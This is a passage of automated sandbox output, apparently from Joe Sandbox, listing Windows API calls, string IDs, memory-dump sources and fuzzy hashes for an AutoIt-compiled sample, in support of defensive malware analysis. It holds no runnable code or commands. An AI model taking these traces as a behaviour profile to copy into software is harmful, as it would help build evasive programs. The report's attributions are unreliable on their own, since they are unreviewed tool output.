                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EBA668
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EBA67D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: '
                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                        • Opcode ID: 5bcca5abf0a96892e1a530059888188dc6d76d39579e22d50c32b5f8da580917
                                                                                                                        • Instruction ID: 81d2178468f7b6fb4df69c5caa0f8ae1ea758e6d8d2d6c67bc4d27444dc3818b
                                                                                                                        • Opcode Fuzzy Hash: 5bcca5abf0a96892e1a530059888188dc6d76d39579e22d50c32b5f8da580917
                                                                                                                        • Instruction Fuzzy Hash: 9A4116B5A012099FDF14CF68C880BDA7BB5FB08304F18507AE905EB385D770A945CFA1
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00EB961B
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EB9657
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: 00301302790c8ce11a8208c4f59bf3352c1b631af22f11980e05b345bcfe623e
                                                                                                                        • Instruction ID: 4e8ff4cfc5fe8f192b5ad353580d2fc231ddb490b6cfb2281d3d975b6d4d45b6
                                                                                                                        • Opcode Fuzzy Hash: 00301302790c8ce11a8208c4f59bf3352c1b631af22f11980e05b345bcfe623e
                                                                                                                        • Instruction Fuzzy Hash: F031C131100204AEEB109F34DC40FFB77A8FF48764F00A519F9A9E7191CA319C81D760
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95BE4
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E95C1F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: 22a1471fc536f5e81cf443a8d922f4fe072bbc436ea72b9dc8ff4445b0996e45
                                                                                                                        • Instruction ID: 29b41bd3d996b55573667d6f4b0b3628dbee95c7d52f66b0100675899148624d
                                                                                                                        • Opcode Fuzzy Hash: 22a1471fc536f5e81cf443a8d922f4fe072bbc436ea72b9dc8ff4445b0996e45
                                                                                                                        • Instruction Fuzzy Hash: 0F319333600709EBDF268F99D885BAEFBF4EF05358F185019E985B61A0E7709A45DB10
                                                                                                                        APIs
                                                                                                                        • __snwprintf.LIBCMT ref: 00EA6BDD
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                        • Opcode ID: e0475916aa1f1443483c765c74b623db9e8e5582fa1eab6f85b36f4c76fe35c0
                                                                                                                        • Instruction ID: 7744b6916e0dc12b37fc898954d7a0c1dbc1d9a8d7a951ea736909f46a76349e
                                                                                                                        • Opcode Fuzzy Hash: e0475916aa1f1443483c765c74b623db9e8e5582fa1eab6f85b36f4c76fe35c0
                                                                                                                        • Instruction Fuzzy Hash: 9121AE71600218AECF11EFA4CC82AEDB7F9EB8A700F145855F805BB182DA70EA45DB61
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EB9269
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EB9274
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EB9775
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00EB978F
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00EB94A6
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EB94B5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95CF3
                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E95D12
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EA544C
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EA5475
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        APIs
                                                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00EAAD32
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: htonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E8C5E5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E8C4E1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E8C562
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                        APIs
                                                                                                                        • __umatherr.LIBCMT ref: 00E7DA2A
                                                                                                                          • Part of subcall function 00E7DD86: __ctrlfp.LIBCMT ref: 00E7DDE5
                                                                                                                        • __ctrlfp.LIBCMT ref: 00E7DA47
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __ctrlfp$__umatherr
                                                                                                                        • String ID: xn
                                                                                                                        • API String ID: 219961500-2689218296
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E8B36B
                                                                                                                          • Part of subcall function 00E72011: _doexit.LIBCMT ref: 00E7201B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Message_doexit
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00ECBAB8
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00ECBCAB
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                        • String ID: WIN_XPe
                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB84DF
                                                                                                                        • PostMessageW.USER32(00000000), ref: 00EB84E6
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB849F
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EB84B2
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00E9D01E
                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E9D035
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371